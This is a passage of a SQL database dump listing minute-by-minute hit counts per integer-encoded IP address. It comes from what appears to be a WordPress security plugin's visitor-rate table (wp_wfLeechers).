(24946262, 1374769563, 1),
(24946454, 3250485790, 1),
(24946455, 1338305248, 1),
(24946498, 1338305248, 1),
(24946634, 1338305248, 1),
(24946689, 2637637388, 2),
(24946694, 1600967944, 1),
(24946694, 2996488237, 1),
(24946778, 1338305248, 1),
(24946857, 2637637439, 1),
(24947095, 3475901784, 1),
(24947184, 872366395, 1),
(24947252, 2303381350, 1),
(24947290, 872366375, 1),
(24947338, 1123631626, 2),
(24947383, 1123631811, 1),
(24947383, 1123631626, 1),
(24947443, 1439241202, 2),
(24947444, 1439241202, 2),
(24947505, 1538656104, 2),
(24947654, 1123631626, 1),
(24947666, 1374769563, 1),
(24947676, 1123631626, 1),
(24947686, 1123631626, 1),
(24947692, 2637637378, 1),
(24947696, 1123631626, 1),
(24947705, 1123631626, 1),
(24947714, 1123631626, 1),
(24947723, 1123631626, 1),
(24947733, 1123631626, 1),
(24947742, 1123631626, 1),
(24947751, 1123631626, 1),
(24947761, 1123634116, 2),
(24947761, 1247137892, 1),
(24947770, 1123634116, 1),
(24947780, 1123634116, 1),
(24947787, 1123634116, 1),
(24947790, 1123634116, 1),
(24947800, 1123634116, 1),
(24947810, 1123634116, 1),
(24947819, 1123634116, 1),
(24947828, 1439301535, 3),
(24947829, 1439301535, 1),
(24947830, 1123634116, 1),
(24947835, 1570674771, 2),
(24947842, 1123634116, 1),
(24947992, 1338304941, 1),
(24948076, 3373404845, 1),
(24948089, 1123633950, 1),
(24948094, 1837270443, 1),
(24948095, 1837270443, 1),
(24948096, 1837270443, 1),
(24948155, 2731721858, 3),
(24948499, 1123632542, 1),
(24948517, 1600967971, 1),
(24948517, 621375768, 1),
(24948631, 3267064321, 1),
(24948656, 1123632542, 1),
(24948779, 872366346, 1),
(24948780, 96753435, 1),
(24948843, 3495573956, 1),
(24948970, 2637637389, 2),
(24948993, 1570674744, 1),
(24949035, 1123633950, 2),
(24949055, 1123633950, 1),
(24949064, 1374769563, 1),
(24949066, 2509963133, 1),
(24949111, 1123633936, 1),
(24949324, 1796538632, 1),
(24949337, 2077123573, 1),
(24949387, 3024883461, 1),
(24949465, 1123634307, 1),
(24949465, 1123631626, 1),
(24949690, 2637637402, 2),
(24949797, 3475901784, 1),
(24949798, 3475901784, 1),
(24949825, 2760155418, 1),
(24949842, 3154458345, 1),
(24949968, 3649587542, 1),
(24950098, 3427775491, 1),
(24950268, 867140598, 1),
(24950272, 136172254, 1),
(24950402, 786802756, 1),
(24950412, 2637637377, 2),
(24950468, 2760155805, 1),
(24950482, 3645214530, 1),
(24950482, 3645214527, 1),
(24950561, 1374769563, 1),
(24950575, 1374769563, 1),
(24950602, 1837875234, 1),
(24950704, 3492536661, 6),
(24950705, 3492536661, 2),
(24951133, 3475901897, 2),
(24951151, 3475901784, 1),
(24951214, 2509963186, 1),
(24951315, 1538656104, 2),
(24951322, 2366148111, 1),
(24951322, 1570674771, 1),
(24951425, 1600959233, 1),
(24951429, 2503519569, 1),
(24951491, 1538656104, 1),
(24951492, 1538656104, 1),
(24951546, 1123631300, 1),
(24951707, 872366373, 1),
(24951707, 96753435, 1),
(24951792, 758593298, 5),
(24951793, 758593298, 4),
(24951848, 1123631300, 1),
(24951864, 2637637409, 2),
(24952052, 1374769563, 1),
(24952082, 2996488251, 1),
(24952082, 1570674758, 1),
(24952082, 621375750, 1),
(24952097, 1123631300, 1),
(24952128, 1123631300, 1),
(24952155, 3645214533, 2),
(24952155, 3645214526, 1),
(24952194, 1123631300, 1),
(24952290, 1123631300, 1),
(24952428, 1123631300, 1),
(24952585, 786801762, 1),
(24952602, 1123631171, 1),
(24952602, 1123631300, 1),
(24952642, 1123631300, 1),
(24952663, 1123631300, 1),
(24952709, 1123631300, 1),
(24952730, 3652617401, 1),
(24952879, 1123631300, 1),
(24952934, 1123631300, 1),
(24952962, 872366346, 1),
(24952990, 1123631300, 2),
(24953045, 136172254, 1),
(24953058, 1374769563, 1),
(24953065, 2637637395, 1),
(24953131, 1374824265, 3),
(24953166, 1374824265, 1),
(24953172, 1570674744, 1),
(24953288, 2032808987, 2),
(24953309, 3657081847, 1),
(24953390, 1463837825, 3),
(24953395, 1837280593, 2),
(24953436, 2637637594, 1),
(24953439, 1374769563, 1),
(24953580, 2745959577, 1),
(24953586, 1837280593, 2),
(24953599, 3024883608, 1),
(24953599, 3024883483, 1),
(24953601, 3024883590, 1),
(24953623, 1815808080, 2),
(24953630, 3657081847, 1),
(24953785, 3657081847, 1),
(24953786, 2637637428, 1),
(24954015, 1338305640, 1),
(24954039, 3024883606, 1),
(24954058, 1338305640, 1),
(24954059, 583939196, 3),
(24954105, 3512711304, 1),
(24954112, 1338305640, 1),
(24954126, 96317622, 12),
(24954168, 3166510073, 1),
(24954194, 1338305640, 1),
(24954236, 2297635928, 2),
(24954237, 2297635928, 4),
(24954238, 2297635928, 6),
(24954239, 2297635928, 1),
(24954261, 1439283878, 1),
(24954318, 2731721828, 2),
(24954338, 1338305640, 1),
(24954507, 2637637428, 1),
(24954520, 1123631300, 2),
(24954655, 3180686846, 1),
(24954666, 3587417960, 2),
(24954722, 676177710, 1),
(24954729, 1123631300, 1),
(24954780, 1538656104, 2),
(24954783, 1123631300, 1),
(24954784, 1837280593, 2),
(24954802, 676177847, 1),
(24954813, 3587417960, 2),
(24954854, 1837280593, 2),
(24954890, 1538656104, 2),
(24954896, 2509959250, 1),
(24954927, 1374769563, 1),
(24955005, 1837280593, 2),
(24955036, 676177710, 1),
(24955036, 2637637594, 1),
(24955043, 1123631300, 1),
(24955089, 1123631300, 1),
(24955194, 1123631300, 1),
(24955210, 1123631171, 1),
(24955210, 1123631300, 1),
(24955228, 2637637400, 2),
(24955230, 3024883614, 1),
(24955250, 1123631300, 1),
(24955296, 3652617279, 1),
(24955296, 96753435, 1),
(24955393, 1123631300, 1),
(24955438, 2760155429, 1),
(24955613, 1123631300, 1),
(24955699, 1123631300, 1),
(24955848, 3024883481, 1),
(24956031, 1374769563, 1),
(24956042, 2637637379, 2),
(24956072, 3567663235, 1),
(24956106, 676177710, 1),
(24956156, 1123631300, 2),
(24956171, 3342489297, 2),
(24956197, 1123631300, 1),
(24956352, 1374769563, 1),
(24956462, 1837280593, 3),
(24956550, 3024883480, 1),
(24956763, 2637637379, 1),
(24956813, 2954838202, 1),
(24956954, 676177710, 1),
(24956974, 1374769563, 1),
(24957014, 84515914, 5),
(24957483, 1374769563, 1),
(24957556, 2637637379, 2),
(24957651, 676177847, 1),
(24957652, 2996488242, 1),
(24957655, 1538362361, 3),
(24957655, 2919004276, 1),
(24957657, 1538362361, 2),
(24957749, 1538472373, 1),
(24957750, 1538472373, 1),
(24957793, 1399309361, 1),
(24957917, 676177847, 1),
(24958019, 2637637527, 1),
(24958021, 2637637527, 1),
(24958139, 676177847, 1),
(24958292, 3475901888, 1),
(24958337, 3024883599, 1),
(24958488, 1600967956, 1),
(24958490, 1123635081, 2),
(24958501, 1123635081, 1),
(24958512, 1123635081, 1),
(24958539, 3233508538, 1),
(24958723, 1332607321, 1),
(24958739, 1837182367, 1),
(24958740, 2366145606, 1),
(24958778, 3492536660, 2),
(24958875, 1123635081, 1),
(24958910, 1123635081, 1),
(24958916, 1123635081, 1),
(24958923, 676177847, 1),
(24958929, 2071806886, 1),
(24958985, 2071806883, 1),
(24959010, 1834585734, 2),
(24959011, 1834585734, 1),
(24959012, 1834585734, 1),
(24959015, 2637637427, 2),
(24959057, 1123633613, 1),
(24959076, 1374769563, 1),
(24959145, 1123633613, 1),
(24959186, 2680892047, 1),
(24959186, 1374769563, 1),
(24959215, 1123633421, 1),
(24959215, 1123633540, 1),
(24959339, 1538615370, 1),
(24959355, 1123633540, 1),
(24959392, 1123633540, 1),
(24959437, 1123633540, 1),
(24959455, 3024883483, 1),
(24959495, 1815808070, 3),
(24959528, 1123633540, 1),
(24959559, 1123633540, 1),
(24959569, 1123633540, 1),
(24959614, 1123633540, 1),
(24959646, 1123633540, 1),
(24959790, 1844203978, 5),
(24959793, 1123633540, 1),
(24959829, 1123633540, 1),
(24959843, 1123633540, 1),
(24959854, 1123633540, 1),
(24959865, 1123633540, 1),
(24959876, 1123633540, 1),
(24959887, 1123633540, 1),
(24959896, 1123633540, 1),
(24959907, 1123633540, 1),
(24960070, 1370060441, 1),
(24960075, 1073352502, 1),
(24960262, 1123633540, 2),
(24960268, 1123633540, 1),
(24960373, 1123633540, 1),
(24960378, 3475901900, 1),
(24960464, 3587417960, 3),
(24960482, 1374769563, 1),
(24960546, 2637637594, 2),
(24960563, 2637637527, 1),
(24960640, 599388095, 1),
(24960664, 1123631300, 1),
(24960666, 1123631300, 1),
(24960830, 1570674765, 1),
(24960869, 1338306317, 1),
(24960981, 623920375, 1),
(24960988, 623920375, 9),
(24961103, 2637637401, 1),
(24961190, 1338306317, 1),
(24961315, 1374769563, 1),
(24961345, 3657088185, 1),
(24961362, 1092908185, 1),
(24961363, 1050916933, 1),
(24961565, 1463838565, 1),
(24961575, 3657088185, 1),
(24961618, 3657088185, 1),
(24961672, 3657088185, 1),
(24961753, 786801762, 1),
(24961754, 3657088185, 1),
(24961773, 1123631300, 2),
(24961863, 1837280593, 2),
(24961885, 1374769563, 1),
(24961887, 1123631300, 1),
(24961898, 3657088185, 1),
(24961903, 1123631300, 1),
(24961919, 1123631300, 1),
(24961935, 1123631300, 1),
(24961940, 1123631300, 1),
(24961970, 1123631300, 1),
(24962067, 1837280593, 2),
(24962082, 1123631300, 1),
(24962100, 1123631300, 1),
(24962117, 1123631300, 1),
(24962173, 1123631300, 1),
(24962174, 1355389021, 1),
(24962175, 1355389021, 1),
(24962181, 96753435, 1),
(24962321, 3024883468, 1),
(24962321, 3024883490, 1),
(24962322, 3024883473, 1),
(24962330, 1837280593, 2),
(24962354, 1123631300, 1),
(24962394, 1123631300, 1),
(24962600, 3475901899, 1),
(24962653, 1123631300, 1),
(24962689, 1123631300, 1),
(24962733, 2745959577, 1),
(24962849, 1538656104, 2),
(24962864, 1371104126, 1),
(24962866, 1538361201, 1),
(24962867, 1538361201, 3),
(24962869, 1538361201, 6),
(24962970, 872366385, 1),
(24962970, 1405240484, 1),
(24963208, 2509962199, 1),
(24963275, 3475901815, 1),
(24963304, 1123631300, 2),
(24963335, 1837280593, 1),
(24963336, 1837280593, 1),
(24963348, 3475901899, 1),
(24963363, 3492536660, 2),
(24963364, 3492536660, 6),
(24963374, 1538629115, 1),
(24963401, 1463838565, 1),
(24963416, 3475901815, 1),
(24963511, 1538656104, 2),
(24963514, 1838045613, 1),
(24963566, 1123631300, 1),
(24963657, 3475901731, 3),
(24963667, 1123631300, 1),
(24963743, 1123631300, 1),
(24963789, 1123631171, 1),
(24963789, 1123631300, 1),
(24963794, 1123631300, 1),
(24963801, 1399309361, 2),
(24963914, 1123631300, 1),
(24964078, 2637637391, 1),
(24964096, 1123631300, 1),
(24964200, 3024883481, 1),
(24964218, 1123631300, 1),
(24964223, 1123631300, 1),
(24964262, 1123631300, 1),
(24964470, 1109508276, 1),
(24964478, 1109508276, 1),
(24964517, 1123631300, 1),
(24964572, 1123631300, 1),
(24964623, 1463838565, 1),
(24964628, 1123631300, 1),
(24964633, 1123631300, 1),
(24964637, 919627301, 1),
(24964659, 1123633950, 1),
(24964693, 1375116803, 4),
(24964696, 1375116803, 2),
(24964768, 3587417960, 1),
(24964808, 2637637391, 2),
(24964850, 2366148260, 1),
(24964923, 1837280593, 2),
(24965082, 1374769563, 1),
(24965102, 1834526758, 1),
(24965119, 1401300047, 1),
(24965303, 621375758, 1),
(24965377, 3475901815, 1),
(24965400, 1399309361, 2),
(24965589, 2637637391, 1),
(24965645, 1123632542, 2),
(24965662, 1600959772, 1),
(24965662, 2366145549, 1),
(24965670, 1123632542, 1),
(24965701, 1123632419, 1),
(24965701, 1123632542, 1),
(24965710, 3024883604, 1),
(24965813, 1123632542, 1),
(24965825, 1374769563, 1),
(24965825, 632922577, 2),
(24965830, 1834596186, 1),
(24965839, 1834596186, 2),
(24965840, 1834596186, 2),
(24965898, 2366145606, 1),
(24965903, 1399309361, 2),
(24965919, 1466596995, 1),
(24965949, 878139038, 1),
(24965953, 1123632542, 1),
(24966042, 2680913949, 9),
(24966066, 1834584698, 1),
(24966153, 1123633950, 1),
(24966168, 1123633950, 1),
(24966175, 3475901731, 1),
(24966175, 2637637616, 1),
(24966230, 921557824, 2),
(24966275, 96753435, 1),
(24966275, 3652617281, 1),
(24966333, 2637637409, 2),
(24966449, 2509959832, 1),
(24966451, 1399309361, 2),
(24966468, 3475901815, 2),
(24966471, 2637637616, 1),
(24966658, 1123631626, 1),
(24966931, 2637637506, 2),
(24967057, 2637637401, 1),
(24967070, 2637637401, 1),
(24967133, 2783005766, 1),
(24967245, 3024883607, 1),
(24967251, 1600959772, 1),
(24967270, 1374769563, 1),
(24967282, 1137661233, 3),
(24967283, 2928290816, 1),
(24967291, 3512712573, 1),
(24967326, 1123631626, 1),
(24967365, 1161474618, 3),
(24967366, 1161474618, 6),
(24967801, 1570674771, 1),
(24967804, 2637637401, 1),
(24967967, 1837280593, 2),
(24968229, 3024883600, 1),
(24968429, 3657083672, 1),
(24968449, 1837280593, 2),
(24968467, 2996488203, 1),
(24968672, 3281709424, 1),
(24968734, 3024883470, 1),
(24968750, 3657083672, 1),
(24968820, 100556958, 2),
(24968888, 1837920118, 1),
(24968905, 3657083672, 1),
(24968926, 1170573314, 1),
(24968934, 621375751, 1),
(24969109, 2637637428, 1),
(24969115, 2366148185, 1),
(24969132, 1123634244, 2),
(24969135, 3657083672, 1),
(24969150, 1464061315, 1),
(24969151, 1464061315, 1),
(24969178, 3657083672, 1),
(24969189, 2366148131, 1),
(24969232, 3657083672, 1),
(24969271, 782305590, 1),
(24969297, 1538656104, 2),
(24969314, 3657083672, 1),
(24969458, 3657083672, 1),
(24969476, 1123634244, 1),
(24969613, 1123631811, 1),
(24969613, 1123634244, 1),
(24969740, 3024883600, 1),
(24969786, 3492536660, 6),
(24969787, 3492536660, 1),
(24969787, 3492536661, 1),
(24969796, 1123634244, 1),
(24969837, 2637637428, 1),
(24969947, 1538615370, 1),
(24970021, 2366148185, 1),
(24970039, 1834559909, 2),
(24970096, 96753435, 1),
(24970096, 872366385, 1),
(24970113, 3166542325, 2),
(24970122, 1374769563, 1),
(24970247, 3427775492, 1),
(24970255, 1123631626, 1),
(24970261, 1123634244, 1),
(24970276, 1123634244, 1),
(24970506, 1374769563, 1),
(24970555, 3587417960, 1),
(24970570, 1123634238, 1),
(24970571, 1123634238, 1),
(24970709, 2637637428, 1),
(24970722, 1374769563, 1),
(24970835, 2461654898, 1),
(24970843, 1837280593, 2),
(24970874, 1123631300, 1),
(24970917, 3024883475, 1),
(24970930, 786801765, 1),
(24971086, 3106783463, 1),
(24971095, 872366369, 1),
(24971145, 2745959577, 1),
(24971418, 1837280593, 2),
(24971589, 1834609551, 3),
(24971590, 1834609551, 3),
(24971902, 3475901901, 1),
(24971950, 633042990, 18),
(24972148, 2954838202, 1),
(24972194, 520974922, 2),
(24972194, 520974913, 1),
(24972194, 520974918, 1),
(24972194, 1121751542, 1),
(24972203, 1123631300, 1),
(24972211, 1123631300, 1),
(24972220, 1123631300, 1),
(24972228, 758636621, 1),
(24972228, 1123631300, 1),
(24972236, 1123631300, 1),
(24972244, 1123631300, 1),
(24972252, 1123631300, 1),
(24972260, 1123631300, 1),
(24972268, 1123631300, 1),
(24972276, 1123631300, 1),
(24972292, 1123631300, 1),
(24972299, 1123631300, 1),
(24972307, 1123631300, 1),
(24972313, 632837775, 1),
(24972315, 1123631300, 2),
(24972322, 1123631300, 1),
(24972330, 1123631300, 1),
(24972338, 1123631300, 1),
(24972467, 1541139809, 2),
(24972637, 2637637409, 1),
(24972859, 1538512053, 1),
(24972861, 3024883475, 1),
(24972861, 3024883483, 1),
(24972895, 3024883618, 1),
(24972922, 1837280593, 2),
(24972935, 1538656104, 2),
(24972992, 1123631300, 1),
(24973064, 1123631171, 1),
(24973064, 1123631300, 1),
(24973171, 1538615370, 1),
(24973186, 1123631300, 1),
(24973323, 1538629115, 1),
(24973339, 3475901792, 1),
(24973384, 2637637409, 1),
(24973412, 1374769563, 1),
(24973434, 1123631300, 1),
(24973468, 1123631300, 1),
(24973509, 1123631300, 1),
(24973580, 1123631300, 1),
(24973614, 1998329138, 1),
(24973614, 1998329197, 1),
(24973630, 1123631300, 1),
(24973757, 1123631300, 2),
(24973757, 1123633950, 2),
(24973776, 3475901792, 2),
(24973803, 1123631300, 1),
(24973886, 3475901837, 1),
(24973954, 1123631300, 1),
(24974005, 2366148130, 1),
(24974006, 100662534, 1),
(24974065, 1123631300, 1),
(24974112, 96753435, 1),
(24974112, 2760155469, 1),
(24974227, 621375768, 1),
(24974227, 1600967971, 1),
(24974278, 1123631300, 1),
(24974332, 3166540021, 1),
(24974338, 921308649, 1),
(24974357, 919627301, 1),
(24974390, 3024883608, 1),
(24974441, 2989642493, 1),
(24974443, 2989642493, 2),
(24974558, 632900847, 1),
(24974565, 621375751, 1),
(24974568, 1463834777, 1),
(24974742, 3024883469, 1),
(24974772, 2637637409, 1),
(24974787, 3472744982, 4),
(24974867, 2637637433, 2),
(24974882, 1837280593, 1),
(24974996, 1374769563, 1),
(24975111, 1374769563, 1),
(24975155, 1374769563, 1),
(24975158, 3512960595, 1),
(24975370, 3024883487, 1),
(24975494, 3475901898, 1),
(24975722, 3652617392, 1),
(24975761, 1123635081, 2),
(24975830, 1374769563, 1),
(24975842, 3003111232, 2),
(24975871, 3475901792, 1),
(24975883, 1834514215, 1),
(24975908, 3472376328, 1),
(24975974, 1123635081, 1),
(24975976, 3475901792, 1),
(24975989, 3657083499, 1),
(24976003, 1512198042, 1),
(24976107, 1374769563, 1),
(24976131, 1834512911, 1),
(24976204, 1123635081, 1),
(24976265, 1123634948, 1),
(24976265, 1123635081, 1),
(24976268, 2509959733, 1),
(24976291, 919627301, 1),
(24976310, 3657083499, 1),
(24976356, 2637637379, 1),
(24976434, 1837280593, 2),
(24976465, 3657083499, 1),
(24976505, 1374769563, 1),
(24976590, 1538704198, 3),
(24976591, 1538704198, 1),
(24976637, 1374769563, 1),
(24976695, 3657083499, 1),
(24976738, 3657083499, 1),
(24976792, 3657083499, 1),
(24976848, 1358347396, 1),
(24976874, 3657083499, 1),
(24976933, 1358347396, 1),
(24977018, 3657083499, 1),
(24977019, 1358347396, 1),
(24977028, 1358347396, 1),
(24977046, 1358347396, 1),
(24977065, 3475901792, 1),
(24977095, 2637637426, 1),
(24977104, 1358347396, 1),
(24977151, 1358347396, 1),
(24977174, 1358347396, 1),
(24977203, 1358347396, 1),
(24977248, 2513051914, 1),
(24977249, 1358347396, 1),
(24977303, 2513061429, 1),
(24977307, 1123633540, 2),
(24977383, 1123633540, 1),
(24977487, 3475901792, 1),
(24977511, 3157024305, 1),
(24977512, 3157024305, 2),
(24977515, 3157024305, 1),
(24977549, 676177702, 1),
(24977566, 1123633540, 1),
(24977620, 632818382, 1),
(24977681, 772030661, 9),
(24977681, 1374769563, 1),
(24977694, 1123633540, 1),
(24977868, 96753435, 1),
(24977868, 2760155473, 1),
(24977933, 1123631576, 1),
(24977937, 1123633540, 1),
(24977995, 1123633613, 2),
(24978006, 1123633540, 1),
(24978007, 1123633540, 1),
(24978016, 1123633540, 1),
(24978026, 1123633540, 1),
(24978032, 3475901741, 1),
(24978187, 1568199530, 1),
(24978230, 3281709424, 1),
(24980638, 2637637388, 1);
INSERT INTO `wp_wfLeechers` (`eMin`, `IP`, `hits`) VALUES
(24980654, 1055650208, 1),
(24980656, 1055650208, 12),
(24980658, 1055650208, 13),
(24980723, 1538656104, 2),
(24980747, 1439284595, 1),
(24980749, 1439284595, 1),
(24980769, 1123632645, 2),
(24980775, 1439284595, 1),
(24980805, 3024883465, 1),
(24980805, 3024883610, 1),
(24980829, 1837865894, 2),
(24980869, 1374776940, 7),
(24980870, 1374776940, 1),
(24980954, 598126853, 1),
(24981018, 621375768, 1),
(24981018, 1600959772, 1),
(24981083, 1123631171, 1),
(24981083, 1123632645, 1),
(24981145, 1123632645, 1),
(24981256, 3251971736, 2),
(24981277, 1123632645, 2),
(24981281, 3645214531, 1),
(24981281, 3645214526, 1),
(24981281, 3645214530, 1),
(24981309, 3024883595, 1),
(24981348, 1123632645, 1),
(24981357, 2366148260, 1),
(24981387, 2637637399, 1),
(24981655, 1123632645, 1),
(24981682, 1837280593, 2),
(24981710, 1570674771, 1),
(24981711, 1600959247, 1),
(24981720, 2366145549, 1),
(24981745, 621375758, 1),
(24981746, 621375751, 1),
(24981762, 1600967971, 1),
(24981980, 3512961611, 1),
(24982094, 96260904, 7),
(24982116, 1837280593, 2),
(24982166, 1355389035, 1),
(24982168, 1355389035, 3),
(24982169, 1355389035, 2),
(24982337, 1355291200, 1),
(24982338, 1355291200, 2),
(24982343, 1355291200, 1),
(24982364, 1123633950, 1),
(24982379, 96753435, 1),
(24982379, 3652617276, 1),
(24982420, 620875541, 1),
(24982421, 867140598, 1),
(24982697, 3003111232, 1),
(24982977, 1837161381, 1),
(24982993, 1998329142, 1),
(24983147, 1538656104, 2),
(24983196, 1375116379, 1),
(24983223, 3645212881, 1),
(24983234, 3645212875, 1),
(24983261, 1538359134, 1),
(24983262, 1538359134, 2),
(24983263, 1538359134, 1),
(24983418, 3475901892, 1),
(24983549, 1338304785, 1),
(24983585, 1401346405, 1),
(24983687, 520974776, 1),
(24983687, 1837264142, 1),
(24983688, 1837264142, 2),
(24983710, 2509962139, 1),
(24983870, 1338304785, 1),
(24984025, 1338304785, 1),
(24984138, 3475901894, 1),
(24984255, 3657083602, 1),
(24984298, 3657083602, 1),
(24984334, 1600967943, 1),
(24984352, 3657083602, 1),
(24984356, 1049233589, 2),
(24984357, 1049233589, 1),
(24984434, 3657083602, 1),
(24984578, 3657083602, 1),
(24984588, 1123632645, 2),
(24984591, 1463838565, 1),
(24984610, 3250520646, 1),
(24984611, 3250520646, 3),
(24984612, 3250520646, 2),
(24984682, 2679407696, 1),
(24984734, 2783008843, 1),
(24984891, 3475901880, 1),
(24984897, 2637637538, 1),
(24984915, 1055593041, 1),
(24985260, 1123631171, 1),
(24985260, 1123632645, 1),
(24985341, 1123632645, 1),
(24985399, 1123632645, 1),
(24985425, 621375780, 1),
(24985481, 1123632645, 1),
(24985630, 3427775502, 1),
(24985709, 2509959072, 2),
(24985710, 2509959072, 1),
(24985711, 2509959072, 2),
(24985828, 1538655055, 4),
(24985888, 3475901816, 1),
(24985917, 3427775502, 1),
(24985927, 2637637378, 1),
(24986023, 1837384990, 1),
(24986026, 1837384990, 1),
(24986027, 1837384990, 2),
(24986029, 1837384990, 1),
(24986036, 1054012869, 1),
(24986052, 3024883614, 1),
(24986124, 3154492423, 1),
(24986135, 3587417960, 1),
(24986165, 1123632645, 2),
(24986559, 876162633, 2),
(24986614, 3475901747, 1),
(24986660, 2637637391, 1),
(24986674, 3492536661, 6),
(24986675, 3492536661, 2),
(24986731, 3475901816, 1),
(24986740, 3475901747, 2),
(24986776, 1439267802, 1),
(24986777, 1439267802, 1),
(24986782, 676177698, 2),
(24986793, 3652607679, 1),
(24986864, 1123631626, 1),
(24987022, 1123631626, 1),
(24987204, 1123631811, 1),
(24987204, 1123631626, 1),
(24987204, 3475901747, 1),
(24987266, 3475901747, 1),
(24987273, 1837384990, 1),
(24987285, 1837384990, 2),
(24987286, 1837384990, 2),
(24987293, 1837384990, 1),
(24987306, 1123631626, 1),
(24987311, 1374822686, 1),
(24987312, 1374822686, 3),
(24987312, 520974775, 1),
(24987312, 1538774068, 1),
(24987313, 1374822686, 1),
(24987313, 1538774068, 2),
(24987314, 1538774068, 2),
(24987314, 1374822686, 2),
(24987359, 1538774068, 2),
(24987557, 786801762, 1),
(24987587, 2783008843, 1),
(24987618, 3024883609, 1),
(24987704, 1538595673, 1),
(24987755, 96260888, 7),
(24987838, 1401321089, 1),
(24987945, 783509116, 1),
(24987963, 3475901895, 1),
(24988011, 2954838202, 1),
(24988115, 3585737171, 1),
(24988506, 3024883468, 1),
(24988506, 3024883600, 1),
(24988513, 2521214258, 1),
(24988657, 3104369886, 3),
(24988707, 2637637423, 1),
(24988743, 3103966404, 9),
(24988743, 3249721826, 13),
(24988860, 1796538632, 1),
(24989023, 3512959709, 1),
(24989044, 1054012869, 1),
(24989178, 3373404845, 1),
(24989342, 1375071234, 3),
(24989486, 96753435, 1),
(24989486, 872366427, 1),
(24989595, 2637637423, 1),
(24989697, 872366348, 1),
(24989755, 3475901829, 1),
(24989763, 3475901829, 1),
(24990263, 3251245561, 1),
(24990264, 3251245561, 1),
(24990265, 3251245561, 1),
(24990318, 2637637423, 1),
(24990319, 2637637530, 1),
(24990438, 1838091214, 1),
(24990683, 872366382, 1),
(24990804, 3585737171, 1),
(24990856, 1123634307, 1),
(24990856, 1123634231, 2),
(24991002, 1538595673, 1),
(24991071, 2637637409, 1),
(24991079, 1123634231, 1),
(24991109, 3657083370, 1),
(24991149, 3024883461, 1),
(24991181, 1123634231, 1),
(24991237, 1123634231, 1),
(24991263, 1570674694, 1),
(24991430, 3657083370, 1),
(24991472, 2760155439, 1),
(24991536, 2420904848, 2),
(24991541, 1123631626, 1),
(24991567, 1123634231, 1),
(24991585, 3657084039, 1),
(24991602, 1123631626, 1),
(24991660, 2760155457, 1),
(24991699, 1123631626, 1),
(24991795, 1123631626, 1),
(24991796, 2637637409, 1),
(24991815, 3657084039, 1),
(24991836, 1123634231, 1),
(24991858, 3657084039, 1),
(24991901, 1123634231, 1),
(24991912, 3657084039, 1),
(24991974, 676177789, 1),
(24991994, 3657084039, 1),
(24992110, 1463832178, 1),
(24992138, 3657084039, 1),
(24992150, 1570674758, 1),
(24992150, 1570674722, 1),
(24992150, 2996488242, 1),
(24992278, 1463832178, 1),
(24992293, 632920713, 1),
(24992294, 632920713, 1),
(24992572, 2637637538, 1),
(24992588, 3024883477, 1),
(24992731, 1123635081, 1),
(24992745, 3024883489, 1),
(24992870, 1054002081, 1),
(24992978, 1170583858, 2),
(24993161, 783504431, 1),
(24993292, 2637637538, 1),
(24993772, 1463832178, 1),
(24994018, 2637637538, 1),
(24994043, 3488736748, 2),
(24994490, 1760301570, 7),
(24994491, 1760301570, 2),
(24994627, 1463832178, 1),
(24994749, 2637637398, 1),
(24994791, 1463832178, 1),
(24994833, 1584228905, 1),
(24994967, 1463832178, 1),
(24994974, 1463832178, 1),
(24995049, 1463832178, 1),
(24995051, 919627301, 1),
(24995116, 84818769, 1),
(24995117, 84818769, 1),
(24995148, 583808072, 1),
(24995181, 1123632645, 2),
(24995228, 2745959577, 1),
(24995232, 1463832178, 1),
(24995370, 1837280593, 2),
(24995611, 1123631127, 1),
(24995611, 1123632645, 2),
(24995699, 84848372, 2),
(24995743, 2637637397, 1),
(24995780, 1123632645, 1),
(24995786, 1379793056, 2),
(24995786, 3458838893, 1),
(24995861, 1123632645, 1),
(24995925, 1192045327, 3),
(24995952, 3273261687, 1),
(24996069, 2745986569, 3),
(24996070, 2745986569, 6),
(24996115, 1375113052, 1),
(24996180, 1837280593, 2),
(24996263, 3154445620, 1),
(24996300, 1123632645, 1),
(24996315, 1375118415, 2),
(24996315, 1123632645, 1),
(24996316, 1375118415, 1),
(24996317, 1375118415, 2),
(24996318, 1375118415, 1),
(24996319, 1375118415, 1),
(24996388, 2637637530, 1),
(24996410, 1332604279, 1),
(24996442, 1123632645, 1),
(24996463, 3024883606, 1),
(24996644, 1123632645, 2),
(24996673, 1123632645, 1),
(24996698, 1123632645, 1),
(24996698, 1375113052, 1),
(24996702, 3639886582, 1),
(24996715, 1375113052, 2),
(24996743, 3639886582, 1),
(24996750, 1532393936, 4),
(24996753, 1532393936, 2),
(24996754, 1532393936, 2),
(24996755, 2637637429, 1),
(24996757, 1532393936, 3),
(24996758, 1532393936, 2),
(24996759, 1532393936, 2),
(24996762, 1532393936, 3),
(24996763, 1532393936, 2),
(24996766, 1532393936, 1),
(24996802, 2521218217, 1),
(24997033, 786801763, 1),
(24997052, 1608331759, 1),
(24997088, 1123632645, 1),
(24997129, 96753435, 1),
(24997129, 2760155453, 1),
(24997292, 3003111232, 2),
(24997329, 1123632645, 1),
(24997407, 1375113052, 1),
(24997491, 3154508589, 1),
(24997492, 1532393936, 1),
(24997494, 1532393936, 1),
(24997509, 3652617237, 1),
(24997624, 1123631127, 1),
(24997624, 1123632645, 1),
(24997648, 1463955851, 1),
(24997725, 1123632645, 1),
(24997811, 1123632645, 2),
(24997832, 1532393936, 1),
(24998022, 2637637429, 1),
(24998054, 2509962753, 1),
(24998113, 676177742, 1),
(24998208, 2637637530, 2),
(24998225, 584303793, 1),
(24998654, 2760155461, 1),
(24998669, 3657082077, 1),
(24998769, 1123632580, 2),
(24998795, 1123632580, 1),
(24998944, 3024883600, 1),
(24998944, 3024883592, 1),
(24998944, 3024883605, 1),
(24998947, 1123632580, 1),
(24998990, 3657082077, 1),
(24999072, 3250483965, 1),
(24999145, 3657082077, 1),
(24999146, 520974916, 1),
(24999146, 1463821037, 4),
(24999204, 3154453301, 1),
(24999283, 2637637429, 1),
(24999329, 3024883465, 1),
(24999340, 3154453301, 1),
(24999345, 1538656104, 2),
(24999375, 3657082077, 1),
(24999418, 3657082077, 1),
(24999472, 3657082077, 1),
(24999475, 1123634077, 1),
(24999508, 1375113052, 1),
(24999554, 3657082077, 1),
(24999608, 3264835941, 4),
(24999698, 3657082077, 1),
(24999713, 1123632645, 1),
(24999719, 1161474618, 9),
(24999749, 1123632645, 1),
(24999775, 2957688868, 10),
(24999867, 676177789, 1),
(24999877, 1123632645, 1),
(25000012, 2637637429, 1),
(25000101, 1123632645, 1),
(25000124, 96753435, 1),
(25000124, 2303381409, 1),
(25000205, 3373404845, 1),
